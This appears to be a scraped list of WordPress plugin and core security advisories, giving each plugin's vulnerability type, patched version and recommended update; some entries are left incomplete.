Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Cross-Site Scripting
Patched Version: 5.4
Recommended Action: Update to version 5.4, or a newer patched version

Plugin: Usernoise modal feedback / contact form

Vulnerability: Cross-Site Scripting
Patched Version: 3.7.9
Recommended Action: Update to version 3.7.9, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Authenticated (Administrator+) SQL Injection via *_selected
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: reSmush.it : The original free image compressor and optimizer plugin

Vulnerability: Missing Authorization
Patched Version: 0.4.4
Recommended Action: Update to version 0.4.4, or a newer patched version

Plugin: Gallery Categories by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Essential Real Estate

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Hotjar

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.16
Recommended Action: Update to version 1.0.16, or a newer patched version

Plugin: WCFM Membership – WooCommerce Memberships for Multivendor Marketplace

Vulnerability: Missing Authorization
Patched Version: 2.10.1
Recommended Action: Update to version 2.10.1, or a newer patched version

Plugin: Author Chat

Vulnerability: SQL Injection
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WPS Hide Login

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.9.8
Recommended Action: Update to version 2.9.8, or a newer patched version

Plugin: افزونه پیامک ووکامرس Persian WooCommerce SMS

Vulnerability: Cross-Site Scripting and SQL Injection
Patched Version: 4.4.1
Recommended Action: Update to version 4.4.1, or a newer patched version

Plugin: Quotes Collection

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: WordPress Exit Box Lite

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.10
Recommended Action: Update to version 1.10, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: wpDiscuz <= 3.1.4
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: All-in-One WP Migration and Backup

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.46
Recommended Action: Update to version 6.46, or a newer patched version

Plugin: Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: WPGraphQL

Vulnerability: Information Exposure
Patched Version: 0.3.0
Recommended Action: Update to version 0.3.0, or a newer patched version

Plugin: The Plus Addons for Elementor Page Builder

Vulnerability: Sensitive Data Disclosure
Patched Version: 5.0.7
Recommended Action: Update to version 5.0.7, or a newer patched version

Plugin: WP Reactions Lite

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Booked – Appointment Booking for WordPress

Vulnerability: Missing Authorization on AJAX Actions
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.25.0
Recommended Action: Update to version 1.25.0, or a newer patched version

Plugin: Incoming Links

Vulnerability: Stored Cross-Site Scripting
Patched Version: 0.9.10b
Recommended Action: Update to version 0.9.10b, or a newer patched version

Plugin: Advanced Flamingo

Plugin: WP Source Control

Vulnerability: Directory Traversal
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: quick-post-widget

Plugin: Jock On Air Now

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 5.6.3
Recommended Action: Update to version 5.6.3, or a newer patched version

Plugin: Redirection for Contact Form 7

Vulnerability: Missing Authorization
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Media Library Assistant

Vulnerability: Cross-Site Scripting
Patched Version: 2.74
Recommended Action: Update to version 2.74, or a newer patched version

Plugin: WangGuard

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Mail Subscribe List

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Insecure Direct Object Reference to Post Rating Increase/Decrease
Patched Version: 7.6.4
Recommended Action: Update to version 7.6.4, or a newer patched version

Plugin: WP Activity Log

Vulnerability: Missing Authorization
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: CPO Content Types

Plugin: BP Profile Search

Vulnerability: PHP Object Injection
Patched Version: 4.6
Recommended Action: Update to version 4.6, or a newer patched version

Plugin: Leaflet Maps Marker (Google Maps, OpenStreetMap, Bing Maps)

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Youtube SpeedLoad

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 8.4
Recommended Action: Update to version 8.4, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Missing Authorization in ‘saveSitemapSettings’
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: Change WordPress Login Logo

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Advanced Ads – Ad Manager & AdSense

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.32.0
Recommended Action: Update to version 1.32.0, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Path Traversal to Sensitive Information Disclosure
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: PDF & Print by BestWebSoft – WordPress Posts and Pages PDF Generator Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.4
Recommended Action: Update to version 1.9.4, or a newer patched version

Plugin: 微信机器人高级版

Plugin: School Management System for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 57.0
Recommended Action: Update to version 57.0, or a newer patched version

Plugin: NextScripts: Social Networks Auto-Poster

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.4.18
Recommended Action: Update to version 3.4.18, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.10.2
Recommended Action: Update to version 4.10.2, or a newer patched version

Plugin: Captchinoo, admin login page protection with Google recaptcha

Vulnerability: Missing Authorization to Arbitrary Plugin Installation/Activation
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Paytium: Mollie payment forms & donations

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.3.7
Recommended Action: Update to version 4.3.7, or a newer patched version

Plugin: Fonts Plugin | Use Google Fonts, Adobe Fonts or Upload Fonts

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via blockType arguments
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Unlimited Elements For Elementor (Free Widgets, Addons, Templates)

Vulnerability: Missing Authorization
Patched Version: 1.5.66
Recommended Action: Update to version 1.5.66, or a newer patched version

Plugin: Backup and Staging by WP Time Capsule

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.22.7
Recommended Action: Update to version 1.22.7, or a newer patched version

Plugin: LearnDash LMS

Vulnerability: Arbitrary File Upload
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: GSEOR – WordPress SEO Plugin

Plugin: Assistant – Every Day Productivity Apps

Vulnerability: Authenticated (Editor+) Server Side Request Forgery
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: WooPayments: Integrated WooCommerce Payments

Vulnerability: Payment Bypass
Patched Version: 3.9.4
Recommended Action: Update to one of the following versions, or a newer patched version: 3.9.4, 4.0.3, 4.1.1, 4.2.2, 4.3.1, 4.4.1, 4.5.1

Plugin: Plugin Name: Device Theme Switcher

Plugin: Qtranslate Slug

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.15.4
Recommended Action: Update to version 1.15.4, or a newer patched version

Plugin: W4 Post List

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Seraphinite Accelerator

Vulnerability: Arbitrary Redirect via ‘redir’
Patched Version: 2.20.29
Recommended Action: Update to version 2.20.29, or a newer patched version

Plugin: Download Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.44
Recommended Action: Update to version 3.2.44, or a newer patched version

Plugin: Survey Maker

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Web Accessibility By accessiBe

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.16
Recommended Action: Update to version 1.16, or a newer patched version

Plugin: wp-appointment-schedule-booking-system

Plugin: WP Whois Domain

Plugin: Restaurant Menu – Food Ordering System – Table Reservation

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: 2.3.6
Recommended Action: Update to version 2.3.6, or a newer patched version

Plugin: FireCask Like & Share Button

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: NewStatPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Qi Addons For Elementor

Vulnerability: Authenticated (Contributor+) Local File Inclusion
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: Restaurant & Cafe Addon for Elementor

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Product Feed PRO for WooCommerce by AdTribes – WooCommerce Product Feeds

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 11.2.3
Recommended Action: Update to version 11.2.3, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: No subtitle
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Scripting via rules[0][content] parameter
Patched Version: 0.8.8.6
Recommended Action: Update to version 0.8.8.6, or a newer patched version

Plugin: Column-Matic

Plugin: Seraphinite Accelerator

Vulnerability: Reflected Cross-Site Scripting via ‘rt’
Patched Version: 2.20.29
Recommended Action: Update to version 2.20.29, or a newer patched version

Plugin: GeneratePress Premium

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via Custom Meta
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Unauthenticated SQL Injection
Patched Version: 7.6.6
Recommended Action: Update to version 7.6.6, or a newer patched version

Plugin: your-text-manager

Plugin: Plugin Central

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: SEO Redirection Plugin – 301 Redirect Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.9
Recommended Action: Update to version 7.9, or a newer patched version

Core: WordPress

Vulnerability: XXE Injection
Patched Version: 4.7.20
Recommended Action: Update to one of the following versions, or a newer patched version: 4.7.20, 4.8.16, 4.9.17, 5.0.12, 5.1.9, 5.2.10, 5.3.7, 5.4.5, 5.5.4, 5.6.3, 5.7.1

Plugin: illi Link Party!

Plugin: Zippy

Vulnerability: Authenticated(Author+) PHP Object Injection via unzipPosts
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.5.6
Recommended Action: Update to version 4.5.6, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Authenticated (Author+) Arbitrary File Manipulation
Patched Version: 10.0.1
Recommended Action: Update to one of the following versions, or a newer patched version: 10.0.1, 10.1.1, 10.2.2, 10.3.1, 10.4.1, 10.5.2, 10.6.2, 10.7.1, 10.8.1, 10.9.2, 11.0.1, 11.1.3, 11.2.1, 11.3.3, 11.4.1, 11.5.2, 11.6.1, 11.7.2, 11.8.5, 11.9.2, 12.0.1, 12.1.1, 2.0.9, 2.1.7, 2.2.10, 2.3.10, 2.4.7, 2.5.5, 2.6.6, 2.7.5, 2.8.5, 2.9.6, 3.0.6, 3.1.5, 3.2.5, 3.3.6, 3.4.6, 3.5.6, 3.6.4, 3.7.5, 3.8.5, 3.9.9, 4.0.6, 4.1.3, 4.2.4, 4.3.4, 4.4.4, 4.5.2, 4.6.2, 4.7.3, 4.8.4, 4.9.2, 5.0.2, 5.1.3, 5.2.4, 5.3.3, 5.4.3, 5.5.4, 5.6.4, 5.7.4, 5.8.3, 5.9.3, 6.0.3, 6.1.4, 6.2.4, 6.3.6, 6.4.5, 6.5.3, 6.6.4, 6.7.3, 6.8.4, 6.9.3, 7.0.4, 7.1.4, 7.2.4, 7.3.4, 7.4.4, 7.5.6, 7.6.3, 7.7.5, 7.8.3, 7.9.3, 8.0.2, 8.1.3, 8.2.5, 8.3.2, 8.4.4, 8.5.2, 8.6.3, 8.7.3, 8.8.4, 8.9.3, 9.0.4, 9.1.2, 9.2.3, 9.3.4, 9.4.3, 9.5.4, 9.6.3, 9.7.2, 9.8.2, 9.9.2

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Custom Body Class

Vulnerability: Cross-Site Scripting
Patched Version: 0.7.0
Recommended Action: Update to version 0.7.0, or a newer patched version

Plugin: Easing Slider

Vulnerability: Missing Authorization to Unauthenticated Settings Reset
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Video XML Sitemap Generator

Vulnerability: Cross-Site Request Forgery via video_sitemap_generate
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Cross-Site Request Forgery to Arbitrary Ticket Deletion
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: Arbitrary File Modification
Patched Version: 2.10
Recommended Action: Update to version 2.10, or a newer patched version

Plugin: Responsive Plus – Starter Templates, Advanced Features and Customizer Settings for Responsive Theme.

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.6.9
Recommended Action: Update to version 2.6.9, or a newer patched version

Plugin: Contact Form by BestWebSoft – Advanced Contact Us Form Builder for WordPress

Vulnerability: ReflectedCross-Site Scripting
Patched Version: 3.96
Recommended Action: Update to version 3.96, or a newer patched version

Plugin: Database for Contact Form 7, WPforms, Elementor forms

Vulnerability: CSV Injection
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Contact Form & SMTP Plugin for WordPress by PirateForms

Vulnerability: Unauthenticated HTML injection
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Woocommerce Custom Checkout Fields Editor With Drag & Drop

Vulnerability: Reflected Cross-Site Scripting via ‘tab’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Username Updater

Vulnerability: Cross-Site Request Forgery to Username Change
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Hot Linked Image Cacher

Plugin: Post Indexer

Vulnerability: PHP Object Injection
Patched Version: 3.0.6.2
Recommended Action: Update to version 3.0.6.2, or a newer patched version

Plugin: Dokan – Powerful WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.7.6
Recommended Action: Update to version 3.7.6, or a newer patched version

Plugin: ZM Gallery

Plugin: Use Any Font | Custom Font Uploader

Vulnerability: Cross-Site Request Forgery to API Key Deactivation
Patched Version: 6.1.8
Recommended Action: Update to version 6.1.8, or a newer patched version

Plugin: New User Approve

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder

Vulnerability: CSV Injection
Patched Version: 4.3.13
Recommended Action: Update to version 4.3.13, or a newer patched version

Plugin: InfiniteWP Client

Vulnerability: Privilege Escalation
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Export Users With Meta

Plugin: Redirection for Contact Form 7

Vulnerability: Unprotected AJAX Actions
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Anti-Malware Security and Brute-Force Firewall

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.20.96
Recommended Action: Update to version 4.20.96, or a newer patched version

Plugin: SVG Support

Vulnerability: No subtitle
Patched Version: 2.3.20
Recommended Action: Update to version 2.3.20, or a newer patched version

Plugin: AMP for WP – Accelerated Mobile Pages

Vulnerability: Missing Authorization
Patched Version: 0.9.97.20
Recommended Action: Update to version 0.9.97.20, or a newer patched version

Plugin: swipehq-payment-gateway-woocommerce

Plugin: Kadence WooCommerce Email Designer

Vulnerability: PHP Object Injection
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: MailerLite – WooCommerce integration

Vulnerability: Cross-Site Request Forgery via Multiple AJAX Functions
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Analytics Tracker

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Cross-Site Scripting via counter_title parameter
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Simple File List

Vulnerability: Remote Code Execution
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: Bold Timeline Lite

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Woocommerce Tip/Donation

Vulnerability: Authenticated (Shop manager+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Indeed Membership Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.7
Recommended Action: Update to version 8.7, or a newer patched version

Plugin: s2Member – Excellent for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions

Vulnerability: Cross-Site Scripting
Patched Version: 111220
Recommended Action: Update to version 111220, or a newer patched version

Plugin: Contact Form builder with drag & drop for WordPress – Kali Forms

Vulnerability: Missing Authorization to Settings Update
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: JoomSport – for Sports: Team & League, Football, Hockey & more

Vulnerability: Authenticated (Admin+) SQL Injection via orderby
Patched Version: 5.2.6
Recommended Action: Update to version 5.2.6, or a newer patched version

Plugin: WP Spell Check

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.18
Recommended Action: Update to version 9.18, or a newer patched version

Plugin: WP Links Page

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.9.2
Recommended Action: Update to version 4.9.2, or a newer patched version

Plugin: Elementor Website Builder Pro

Vulnerability: Authenticated Remote Code Execution in Dynamic OOO Widget
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: Easy2Map Photos

Vulnerability: Path Traversal
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 6.4.4
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: Exifography

Plugin: Insert Pages

Vulnerability: Authenticated Directory Traversal
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Word Search Puzzles game

Plugin: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates

Vulnerability: Missing Authorization via template_count
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Authenticated (Author+) PHAR Deserialization
Patched Version: 4.5.5
Recommended Action: Update to version 4.5.5, or a newer patched version

Plugin: Sunny Search

Plugin: ShortPixel Image Optimizer – Optimize Images, Convert WebP & AVIF

Vulnerability: Authenticated(Editor+) PHP Object Injection
Patched Version: 5.4.2
Recommended Action: Update to version 5.4.2, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: SQL Injection
Patched Version: 7.3.15.727
Recommended Action: Update to version 7.3.15.727, or a newer patched version

Plugin: Property Hive

Vulnerability: Reflected Cross-Site Scripting via ‘merge_ids’
Patched Version: 1.5.47
Recommended Action: Update to version 1.5.47, or a newer patched version

Plugin: CMS Tree Page View

Vulnerability: Cross-Site Scripting
Patched Version: 0.8.9
Recommended Action: Update to version 0.8.9, or a newer patched version

Plugin: Enable SVG, WebP, and ICO Upload

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Tabs – Responsive Tabs with WooCommerce Product Tab Extension

Vulnerability: Authenticated (Admin+) Arbitrary Options Update
Patched Version: 3.7.0
Recommended Action: Update to version 3.7.0, or a newer patched version

Plugin: Add Any Extension to Pages

Vulnerability: Cross-Site Request Forgery via aaetp_options_page
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Booking Calendar Contact Form

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.41
Recommended Action: Update to version 1.2.41, or a newer patched version

Plugin: Send PDF for Contact Form 7

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 0.9.9.2
Recommended Action: Update to version 0.9.9.2, or a newer patched version

Plugin: Better Anchor Links

Vulnerability: Cross-Site Request Forgery via admin/options.php
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 7.2.3
Recommended Action: Update to version 7.2.3, or a newer patched version

Plugin: Image Optimizer by 10web – Image Optimizer and Compression plugin

Vulnerability: Authenticated(Administator+) Directory Traversal
Patched Version: 1.0.27
Recommended Action: Update to version 1.0.27, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Improper Input Validation
Patched Version: 8.0.5
Recommended Action: Update to version 8.0.5, or a newer patched version

Plugin: ImageLinks Interactive Image Builder for WordPress

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Social Slider Feed

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Theme and plugin translation for Polylang (TTfP)

Vulnerability: Missing Authorization
Patched Version: 3.2.17
Recommended Action: Update to version 3.2.17, or a newer patched version

Core: WordPress

Vulnerability: Server Side Request Forgery
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Relevanssi – A Better Search (Pro)

Vulnerability: Missing Authorization to Unauthorized Post Access
Patched Version: 2.25.0
Recommended Action: Update to version 2.25.0, or a newer patched version

Plugin: Popup | Custom Popup Builder

Vulnerability: Denial of Service
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Core: WordPress

Vulnerability: Open Redirect
Patched Version: 2.0.10
Recommended Action: Update to version 2.0.10, or a newer patched version

Plugin: Login with phone number

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: masterslider

Plugin: AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.6.3
Recommended Action: Update to version 8.6.3, or a newer patched version

Plugin: Star CloudPRNT for WooCommerce

Plugin: Gallery Metabox

Vulnerability: Cross-Site Request Forgery via gallery_remove
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Mobile Domain

Plugin: Bootstrap Shortcodes

Plugin: WP All Import Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.6
Recommended Action: Update to version 2.8.6, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: SQL Injection
Patched Version: 3.2.7.3
Recommended Action: Update to version 3.2.7.3, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated Blind SQL Injection
Patched Version: 12.6.7
Recommended Action: Update to version 12.6.7, or a newer patched version

Plugin: WP Job Board

Vulnerability: Cross-Site Scripting
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: ALO EasyMail Newsletter

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 2.6.01
Recommended Action: Update to version 2.6.01, or a newer patched version

Plugin: Forget About Shortcode Buttons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Cooked Pro

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 1.7.5.7
Recommended Action: Update to version 1.7.5.7, or a newer patched version

Plugin: TextMe SMS

Vulnerability: Missing Authorization via tetxme_update_option_page()
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Sign In Scheduling Online Appointment Booking System

Plugin: My Content Management

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Browser Screenshots

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: WP Not Login Hide (WPNLH)

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: Social Proof Popups & Real-Time Notifications – Herd Effects

Vulnerability: Cross-Site Request Forgery to Effect Deletion
Patched Version: 5.2.4
Recommended Action: Update to version 5.2.4, or a newer patched version

Plugin: Sunshine Photo Cart: Free Client Photo Galleries for Photographers

Vulnerability: Missing Authorization
Patched Version: 2.9.14
Recommended Action: Update to version 2.9.14, or a newer patched version

Core: WordPress

Vulnerability: All Known Versions
Patched Version: No patched version available
Recommended Action: No known patch available. Review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance.

Plugin: ShopLentor – WooCommerce Builder for Elementor & Gutenberg +17 Modules – All in One Solution (formerly WooLentor)

Vulnerability: PHP Object Injection
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: WP OAuth Server (OAuth Authentication)

Vulnerability: No subtitle
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Meet My Team

Plugin: My Tickets – Accessible Event Ticketing

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.8.31
Recommended Action: Update to version 1.8.31, or a newer patched version

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.2.1
Recommended Action: Update to version 7.2.1, or a newer patched version

Plugin: Perfect Brands for WooCommerce

Vulnerability: Server Information Disclosure
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Easy Form Builder – WordPress plugin form builder: contact form, survey form, payment form, and custom form builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
